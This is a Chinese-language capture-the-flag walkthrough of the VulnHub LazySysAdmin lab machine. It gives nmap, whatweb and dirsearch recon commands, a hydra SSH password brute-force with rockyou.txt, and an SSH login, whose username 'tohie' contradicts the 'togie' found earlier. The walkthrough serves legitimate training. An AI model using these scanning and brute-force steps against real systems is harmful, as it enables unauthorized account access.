一、靶机下载地址
https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip
二、信息收集
1、主机发现
# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 '00:0C:29:7F:C6:2D'
2、端口扫描
# 使用命令
nmap 192.168.145.190 -p- -sV
3、指纹识别
# 使用命令
whatweb 192.168.145.190
4、目录扫描
# 使用命令
dirsearch -u "http://192.168.145.190"
三、获取shell
1、访问靶机IP地址
2、拼接并访问/robots.txt
3、逐个拼接访问,在/Backnode_files目录下发现一些js文件,翻了翻,没啥发现
4、拼接并访问/phpmyadmin/index.php,发现数据库管理工具phpmyadmin的登录界面
5、拼接并访问/wordpress,发现里面反复强调我的名字是togie
6、使用hydra工具,爆破togie
用户的密码,得到密码12345
,其中命令中的rockyou.txt
文件在/usr/share/wordlists/
目录下
# 使用命令
hydra -l togie -P rockyou.txt ssh://192.168.145.190
7、使用ssh进行连接
# 使用命令
ssh tohie@192.168.145.190